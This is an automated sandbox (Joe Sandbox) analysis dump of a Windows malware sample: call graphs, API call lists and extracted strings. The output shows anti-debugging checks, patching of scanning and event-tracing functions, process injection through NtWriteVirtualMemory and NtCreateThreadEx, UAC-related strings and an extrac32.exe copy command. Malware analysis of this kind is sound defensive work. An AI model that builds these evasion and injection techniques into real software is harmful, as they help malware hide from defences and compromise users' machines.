API calls 38931->38933 38934 2984798 11 API calls 38932->38934 38936 29a6462 38933->38936 38939 29a6c9f 38934->38939 38938 2997e14 25 API calls 38935->38938 38937 298480c 11 API calls 38936->38937 38943 29a6483 38937->38943 38940 29a7479 38938->38940 38942 2997e14 25 API calls 38939->38942 38941 298480c 11 API calls 38940->38941 38947 29a749a 38941->38947 38944 29a6cc3 38942->38944 38946 2984798 11 API calls 38943->38946 38945 298480c 11 API calls 38944->38945 38950 29a6ce4 38945->38950 38949 29a64ba 38946->38949 38948 2984798 11 API calls 38947->38948 38954 29a74d1 38948->38954 38951 2997e14 25 API calls 38949->38951 38952 2984798 11 API calls 38950->38952 38953 29a64de 38951->38953 38958 29a6d1b 38952->38958 38955 2982ee0 2 API calls 38953->38955 38956 2997e14 25 API calls 38954->38956 38957 29a64e3 38955->38957 38962 29a74f5 38956->38962 38960 298480c 11 API calls 38957->38960 38959 2997e14 25 API calls 38958->38959 38961 29a6d3f 38959->38961 38967 29a651c 38960->38967 38963 299d270 11 API calls 38961->38963 38965 2997e14 25 API calls 38962->38965 38964 29a6d5a 38963->38964 38966 298480c 11 API calls 38964->38966 38969 29a7528 38965->38969 38970 29a6d83 38966->38970 38968 2984798 11 API calls 38967->38968 38972 29a6553 38968->38972 38971 2997e14 25 API calls 38969->38971 38973 298480c 11 API calls 38970->38973 38975 29a755b 38971->38975 38974 2997e14 25 API calls 38972->38974 38977 29a6dbb 38973->38977 38976 29a6577 38974->38976 38979 2997e14 25 API calls 38975->38979 38978 298480c 11 API calls 38976->38978 38980 2984798 11 API calls 38977->38980 38981 29a6598 38978->38981 38982 29a758e 38979->38982 38983 29a6df2 38980->38983 38984 2984798 11 API calls 38981->38984 38985 2997e14 25 API calls 38982->38985 38986 2997e14 25 API calls 38983->38986 38990 29a65cf 38984->38990 38987 29a75c1 38985->38987 38988 29a6e16 38986->38988 38989 298480c 11 API calls 38987->38989 38991 298480c 11 API calls 38988->38991 38994 29a75e2 38989->38994 38992 2997e14 25 API calls 
38990->38992 38996 29a6e37 38991->38996 38993 29a65f3 38992->38993 38995 298480c 11 API calls 38993->38995 38997 2984798 11 API calls 38994->38997 38999 29a6614 38995->38999 38998 2984798 11 API calls 38996->38998 39000 29a7619 38997->39000 39001 29a6e6e 38998->39001 39002 2984798 11 API calls 38999->39002 39003 2997e14 25 API calls 39000->39003 39004 2997e14 25 API calls 39001->39004 39009 29a664b 39002->39009 39005 29a763d 39003->39005 39006 29a6e92 39004->39006 39007 298480c 11 API calls 39005->39007 39008 2987e20 GetFileAttributesA 39006->39008 39016 29a765e 39007->39016 39010 29a6e9c 39008->39010 39011 2997e14 25 API calls 39009->39011 39012 29a717b 39010->39012 39014 298480c 11 API calls 39010->39014 39013 29a666f GetCurrentProcess 39011->39013 39015 298480c 11 API calls 39012->39015 39364 2997944 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 39013->39364 39022 29a6ec5 39014->39022 39021 29a719c 39015->39021 39019 2984798 11 API calls 39016->39019 39018 29a6689 39020 298480c 11 API calls 39018->39020 39025 29a7695 39019->39025 39026 29a66af 39020->39026 39024 2984798 11 API calls 39021->39024 39023 2984798 11 API calls 39022->39023 39030 29a6efc 39023->39030 39031 29a71d3 39024->39031 39027 2997e14 25 API calls 39025->39027 39029 2984798 11 API calls 39026->39029 39028 29a76b9 39027->39028 39032 298480c 11 API calls 39028->39032 39037 29a66e6 39029->39037 39033 2997e14 25 API calls 39030->39033 39034 2997e14 25 API calls 39031->39034 39040 29a76da 39032->39040 39035 29a6f20 39033->39035 39036 29a71f7 39034->39036 39038 298480c 11 API calls 39035->39038 39039 298480c 11 API calls 39036->39039 39041 2997e14 25 API calls 39037->39041 39045 29a6f41 39038->39045 39046 29a7218 39039->39046 39043 2984798 11 API calls 39040->39043 39042 29a670a 39041->39042 39044 298480c 11 API calls 39042->39044 39048 29a7711 39043->39048 39050 29a672b 39044->39050 39049 2984798 11 API calls 39045->39049 39047 2984798 11 API calls 39046->39047 39054 29a724f 39047->39054 
• Control-flow graph, continued (tail of the interactive node/edge rendering; summarized rather than listed): the surviving nodes, in the 029A6762-029A88D5 range, alternate the helper at 02997E14 (25 API calls) with the string helpers 0298480C and 02984798 (11 API calls each). The node at 029A69A8 calls EnumSystemLocalesA and then GetCurrentProcess six times, each followed by 02997CC8 (4 API calls). Other edges pass through 0299CEC8, 02984500 and 029849A4 (11 API calls each), 029981B8 (43 API calls) and 0299C7B4 (18 API calls).
                                                                              APIs
                                                                              • InetIsOffline.URL(00000000,00000000,029A8D49,?,?,00000000,00000000), ref: 0299DAD2
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 0299CD74: GetTickCount.KERNEL32 ref: 0299CD82
                                                                                • Part of subcall function 0299CD74: Sleep.KERNEL32(00000000,?,0299DCF4,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299CD94
                                                                                • Part of subcall function 0299CD74: GetTickCount.KERNEL32 ref: 0299CD99
                                                                                • Part of subcall function 0299D8C4: GetModuleHandleW.KERNEL32(KernelBase,?,0299DD01,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299D8CA
                                                                                • Part of subcall function 0299D8C4: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0299D8DC
                                                                                • Part of subcall function 0299D920: GetModuleHandleW.KERNEL32(KernelBase), ref: 0299D930
                                                                                • Part of subcall function 0299D920: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0299D942
                                                                                • Part of subcall function 0299D920: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0299D959
                                                                                • Part of subcall function 0299D9A4: GetModuleHandleW.KERNEL32(ntdll), ref: 0299D9B4
                                                                                • Part of subcall function 0299D9A4: GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299D9C6
                                                                                • Part of subcall function 0299D9A4: NtQueryInformationProcess.NTDLL(FFFFFFFF,00000007,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299D9E5
                                                                                • Part of subcall function 0299DA24: GetModuleHandleW.KERNEL32(ntdll), ref: 0299DA34
                                                                                • Part of subcall function 0299DA24: GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299DA46
                                                                                • Part of subcall function 0299DA24: NtQueryInformationProcess.NTDLL(FFFFFFFF,0000001F,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299DA65
                                                                                • Part of subcall function 02987E20: GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                                • Part of subcall function 0298C2F4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,0299EAC5,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession), ref: 0298C30B
                                                                                • Part of subcall function 0299C898: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C8D3
                                                                                • Part of subcall function 0299C898: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C903
                                                                                • Part of subcall function 0299C898: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C918
                                                                                • Part of subcall function 0299C898: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C944
                                                                                • Part of subcall function 0299C898: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C94D
                                                                                • Part of subcall function 02987E44: GetFileAttributesA.KERNEL32(00000000,?,029A1920,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 02987E4F
                                                                                • Part of subcall function 02987FD8: CreateDirectoryA.KERNEL32(00000000,00000000,?,029A1ABE,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize,029D7358,029A8D7C,ScanString,029D7358,029A8D7C), ref: 02987FE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Similarity
                                                                              • API ID: FileModule$AddressHandleProc$InformationQuery$AttributesCountLibraryNamePathProcessTick$CacheCheckCloseCreateDebuggerDirectoryFlushFreeInetInstructionLoadName_OfflineOpenPresentReadRemoteSleep
                                                                              • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                              • API String ID: 2874859968-4244479126
                                                                              • Opcode ID: 17754452be089658fc92aaa2800536896a532ed217af990c2a833b8c8306ace1
                                                                              • Instruction ID: 5af98b195a6920553e0caf1465d97ee80d0f8e532a077ffd0dad24334584f013
                                                                              • Opcode Fuzzy Hash: 17754452be089658fc92aaa2800536896a532ed217af990c2a833b8c8306ace1
                                                                              • Instruction Fuzzy Hash: B7040B34A5021A8FDB20FBA4DC90ADEB3BABFD9310F1455E5D009EB250DB31AE819F55

                                                                              Control-flow Graph

• Function 029A5E01-029A8977 (interactive node/edge rendering; summarized rather than listed): the basic blocks 029A5E01-029A5FEB, 029A5FF1-029A61F0, 029A61F6-029A6815, 029A6A2D-029A6BB0 and 029A7381-029A8977 repeat the sequence 0298480C, 0298494C, 029846A4, 02984798, 0298494C, 029846A4, 02997E14 dozens of times. Block 029A61F6-029A6815 additionally calls GetCurrentProcess and 02997944 (NtAllocateVirtualMemory); block 029A681C-029A6A28 calls 029849A4, 0299C978, EnumSystemLocalesA and then GetCurrentProcess followed by 02997CC8 six times; block 029A6BCB-029A6E9E calls 0299D270 and 02987E20 (GetFileAttributesA); block 029A6EA4-029A7176 calls 0299CEC8, 02984500, 02984D8C, 02984734 and 0299C7B4 (NtCreateFile/NtWriteFile); block 029A717B-029A737C calls 029849A4 and 029981B8; the final block 029A7381-029A8977 ends in ExitProcess.
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 02982EE0: QueryPerformanceCounter.KERNEL32 ref: 02982EE4
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C), ref: 029A667E
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69B0
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69B5
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69C9
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69DD
                                                                                • Part of subcall function 02997CC8: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan), ref: 02997CDC
                                                                                • Part of subcall function 02997CC8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997CF6
                                                                                • Part of subcall function 02997CC8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00000000,029D7368,00000001,029D7374,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18), ref: 02997D1C
                                                                                • Part of subcall function 02997CC8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize), ref: 02997D32
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69F1
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A6A05
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A6A19
                                                                                • Part of subcall function 02987E20: GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                                • Part of subcall function 0299C7B4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
                                                                                • Part of subcall function 0299C7B4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
                                                                                • Part of subcall function 0299C7B4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
                                                                                • Part of subcall function 0299C7B4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,Initialize,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C), ref: 029A8977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$Current$Library$AddressFileProc$FreeHandleLoadMemoryModulePathVirtualWrite$AllocateAttributesCacheCloseCounterCreateEnumExitFlushInstructionLocalesNameName_PerformanceQuerySystem
                                                                              • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                              • API String ID: 1226057240-1690217862
                                                                              • Opcode ID: 5e641095b892077b8e4bd6cc68f434687eeb44e4282ad2dd95fbba8cb85c73cd
                                                                              • Instruction ID: 3760c22ea0c867e7fdff9020b3c0b65a752faa61497be61d9728b4c8a76d0ea1
                                                                              • Opcode Fuzzy Hash: 5e641095b892077b8e4bd6cc68f434687eeb44e4282ad2dd95fbba8cb85c73cd
                                                                              • Instruction Fuzzy Hash: 71332B74A1065A8FDB20FBA4DD909DEB3FABFD9310F1454E1E009EB250DA30AE958F51

                                                                              Control-flow Graph

                                                                              control_flow_graph 5864 299a524-299a527 5865 299a52c-299a531 5864->5865 5865->5865 5866 299a533-299ac31 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997a6c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetModuleHandleW GetProcAddress call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtOpenProcess call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 5865->5866 6097 299c1b2-299c44c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 3 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 
2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 6 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29844d0 * 3 5866->6097 6098 299ac37-299adb1 GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 5866->6098 6098->6097 6190 299adb7-299ade7 call 2995884 IsBadReadPtr 6098->6190 6190->6097 6202 299aded-299adf2 6190->6202 6202->6097 6205 299adf8-299ae14 IsBadReadPtr 6202->6205 6205->6097 6207 299ae1a-299ae23 6205->6207 6207->6097 6209 299ae29-299ae4f 6207->6209 6209->6097 6211 299ae55-299afce GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6209->6211 6211->6097 6279 299afd4-299b14a call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6211->6279 6324 299b150-299b3c0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299a3b0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6279->6324 6325 299c032-299c1ad call 298480c call 298494c 
call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6279->6325 6445 299b55e-299b6bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6324->6445 6446 299b3c6-299b3c7 6324->6446 6325->6097 6531 299b6e8-299c00c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299a3bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetModuleHandleW GetProcAddress call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetModuleHandleW GetProcAddress call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 
call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtCreateThreadEx call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6445->6531 6532 299b6be-299b6e3 call 299a300 6445->6532 6447 299b3cb-299b542 call 299a3b0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6446->6447 6538 299b547-299b558 6447->6538 6804 299c011-299c018 6531->6804 6532->6531 6538->6445 6538->6447 6804->6097 6805 299c01e-299c02d CloseHandle 6804->6805 6805->6097
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
